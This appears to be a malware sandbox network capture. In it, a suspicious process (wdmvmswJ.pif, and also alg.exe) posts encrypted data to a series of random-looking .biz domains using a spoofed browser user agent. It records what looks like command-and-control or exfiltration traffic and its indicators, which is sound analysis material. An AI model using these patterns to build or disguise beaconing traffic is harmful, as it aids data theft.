                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ?+/'yC-ywQNQR )-?8s$=`hT.bCQz@8{<cXt)\Rcfix%_RD%d^<J@F?TsX<PLRca@%Y#fql%0(/lj{RdA
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.824629068 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:23:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        34192.168.2.84974913.251.16.150804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.869976997 CET351OUTPOST /uquynocac HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: qaynky.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.869997025 CET802OUTData Raw: b8 2b a6 6b 6f 9e ca ca 16 03 00 00 e6 ed 31 c2 f5 d9 d4 51 84 6e 1b 5f 0e e6 4c 6f f1 66 cc 96 34 eb 37 45 90 90 8d 5f 98 41 a3 1a 64 09 f2 e1 a1 b2 45 01 d4 0d 46 8c 9c f1 8b 3d 53 4e bc 45 13 25 90 3d 60 f5 48 58 6b 55 e5 44 73 80 b2 dc 40 15
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: +ko1Qn_Lof47E_AdEF=SNE%=`HXkUDs@X6L_GOBA4|H:9l6Vj'@UINyr!Hy2K*yiY?)|Jnuh&E,*H% !SFL4SlmB9@v9s
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:58.305274963 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:23:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=dcf8d96d91e7754a8e4d47be24f2b346|173.254.250.82|1730445838|1730445838|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        35192.168.2.84975044.221.84.105804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:58.344016075 CET348OUTPOST /igs HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:58.344037056 CET802OUTData Raw: f2 be 62 4f 2b 1c 68 18 16 03 00 00 36 9c f7 27 67 ed 46 06 1c 23 d1 c7 1a 68 08 fa 05 f0 63 ed ba 5f cd 0f 7f 69 21 07 f4 25 0f a5 5e c7 8e 81 58 7e 2a e0 7f 51 18 88 7d cc 08 1b 7c 56 ea ec 63 38 51 00 c1 38 61 99 07 13 4f 5a cb 0b 36 c2 31 2b
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: bO+h6'gF#hc_i!%^X~*Q}|Vc8Q8aOZ61+f3FT|ZGt}S)*jaqI*(x`~c Hl7W5?p;Y 0F&1V|?,=gC+E=vDj0,?1ZaWc,p|oyka=[2M
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.009752035 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:23:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=d0510afe44841ac23c14b25e59ffc693|173.254.250.82|1730445838|1730445838|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        36192.168.2.84975154.244.188.177804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.240247011 CET354OUTPOST /okedkgjfoq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: dwrqljrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.240308046 CET802OUTData Raw: cf 9e 30 2b 16 ee 0c 73 16 03 00 00 67 5d 2a d5 94 d9 53 48 4e 1d 7a 41 27 a0 a3 f9 92 0b d5 f3 4c c3 a3 f9 a4 a1 59 94 2b af 99 6f a8 6b e8 c0 a8 2d 26 0d fd c2 27 c6 f9 2c 4b ce a4 6e d0 0e 69 a1 a9 06 47 84 61 43 8b 0b 8b 40 30 de d0 91 96 f4
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0+sg]*SHNzA'LY+ok-&',KniGaC@0eJBNRh;N+ZID4ng[t16*4^XEQ0)!wB1go5 NQwOEX{nGl"{jBVVfTZb3y|r%FM?ej7-Em
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.036258936 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:23:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=61e9b3b450ef437a1b2c0cfc9c425b5c|173.254.250.82|1730445839|1730445839|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        37192.168.2.84975247.129.31.212804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.473386049 CET357OUTPOST /wfcpepuolxclud HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: xlfhhhm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.473386049 CET778OUTData Raw: 83 4f d6 af 4b b0 c7 dc fe 02 00 00 ce 27 93 3c 03 1c 77 75 46 d5 db 3a 7a e0 be 05 96 a4 bd fe 8b db 15 a7 2f ec 60 ac c2 60 c8 0e d5 66 a4 a9 6a e4 0e d0 d0 82 0a 58 6a 63 fc bf 1a 0a 2e 8e ef 58 a3 8a 7e 98 1c 8d c5 c5 6f d4 88 0d 4a 19 a9 36
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: OK'<wuF:z/``fjXjc.X~oJ6;h#uA0-)HLtM}kyu;FP.}'`.y3X4R.25h&6oc{8vZ`"Kokmb`y_>ZRyi$xT0"k3SjqM
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.920274019 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=42f049b98f4e8f62c4b1497303d43fcb|173.254.250.82|1730445840|1730445840|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        38192.168.2.84975335.164.78.200804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.088469982 CET346OUTPOST /mwes HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: nqwjmb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.088490963 CET802OUTData Raw: a7 35 f6 67 2b 07 a8 17 16 03 00 00 a4 97 ab 86 74 8a 4c 20 7c 85 d8 a6 23 77 07 0a 96 ed 94 50 05 e4 6d e8 4b b8 06 e8 87 9a 7f e6 b6 25 90 95 a8 e0 4f 97 de 27 1f d9 e4 f6 68 a9 59 19 41 3a 14 0d ba 50 e3 1d 22 5c ea 71 f0 c1 03 da 80 3e 24 00
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 5g+tL |#wPmK%O'hYA:P"\q>$0&^2v|`pA.a_726O~/4oJPk_RD$ZCG8s&)np0sAE[ /mvS>#7U1_(DA?H\nBd
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.923737049 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=aab7b4a6c2c35e6775ab6a0236b8aaf5|173.254.250.82|1730445840|1730445840|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        39192.168.2.84975413.251.16.150804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.224255085 CET344OUTPOST /im HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ifsaia.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.224255085 CET778OUTData Raw: 54 20 4f 3e 71 87 26 d5 fe 02 00 00 72 cb 29 17 71 fc a3 72 61 65 14 62 f2 5a b8 fd b1 53 34 96 bf 71 5a a0 8c 07 23 c6 bd 97 71 6a 65 6e 63 32 5c e5 fe 16 61 f4 5e 74 09 2d c6 2f d5 e3 43 d4 9b 24 d1 65 52 c6 eb c3 1c 0f cc dc 0b 77 81 ef 50 82
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: T O>q&r)qraebZS4qZ#qjenc2\a^t-/C$eRwP_l+SAm#7.Uoj}pC]KOB LE8LsFC h*|G]b<]O^sAlx:a'srBH~USNZnJ,C-TS%U&ou.#c
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.651112080 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=c473b2e15352f9302cd3ab24e4f1a327|173.254.250.82|1730445842|1730445842|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        40192.168.2.8497553.94.10.34804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.232250929 CET355OUTPOST /xhqdokiwwp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ytctnunms.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.232250929 CET802OUTData Raw: fa cd ce 0c 81 c9 6b c1 16 03 00 00 2d ec 0f ab 35 4a f6 26 5d 5b a0 15 a2 ca 17 f3 0a e0 76 79 ce 83 9e 9b e0 d2 76 d9 a0 f3 1e 0b 8b 68 69 f8 21 36 21 af 97 b7 e1 53 63 f2 bf 11 f0 b4 1e 93 28 92 cb fd dd bc 5f 6e fb b6 36 9b 33 7c 41 49 4b 15
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: k-5J&][vyvhi!6!Sc(_n63|AIK2+aXx(]XSKS6C,FR#E+hgLwG'G38a'gp8Vvq~t6]9S}rsX +U@M(waLZP`4+Z8v_t
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.892689943 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:01 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=281aceda934a0bc4ab7eb229f75af062|173.254.250.82|1730445841|1730445841|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        41192.168.2.849756165.160.13.20804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.935746908 CET343OUTPOST /na HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.935771942 CET802OUTData Raw: f2 ef 7f 29 4a f4 80 2e 16 03 00 00 b4 dc c5 b1 a0 60 fa 1e c4 2f 8d 29 39 2b df 2f ea 6c 74 c1 13 ff 28 01 83 e3 fa 15 bc 6e 2e 2d e8 65 d9 03 e8 08 c8 b4 e0 12 45 d1 8b 12 21 b0 49 65 af 36 0d e1 15 01 3b d3 80 95 b1 c7 8d a2 4e 89 fe 64 f8 3a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: )J.`/)9+/lt(n.-eE!Ie6;Nd:c!k9uvBjTuA11{vN3tQyV>ZV~%kwFR(@C.>ufm{PgYH3*uS%TB=nQ;f')e=+r`wp).F
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.622211933 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.669987917 CET345OUTPOST /koph HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.670022011 CET802OUTData Raw: 03 95 cf fb de 32 ab 94 16 03 00 00 44 ca 61 91 aa 43 78 0e 3d f4 d6 d6 33 64 83 51 5a 71 11 51 7a f4 f8 67 a5 2b 1d e5 44 d5 b1 20 b6 c2 55 9b c5 50 ae af 0e 43 20 3e 83 d8 41 4a 72 71 0a 06 f6 37 61 24 6b ad 72 f9 fd 80 88 b3 c2 3a 9b 33 56 0e
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 2DaCx=3dQZqQzg+D UPC >AJrq7a$kr:3V[]gy&!XmnA:Zv`gnwNZ\^'1fKYKlY$Yv^7a-{5`K+}i6bdwY"O]5"8:ZtNOY09XlM6
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.840455055 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


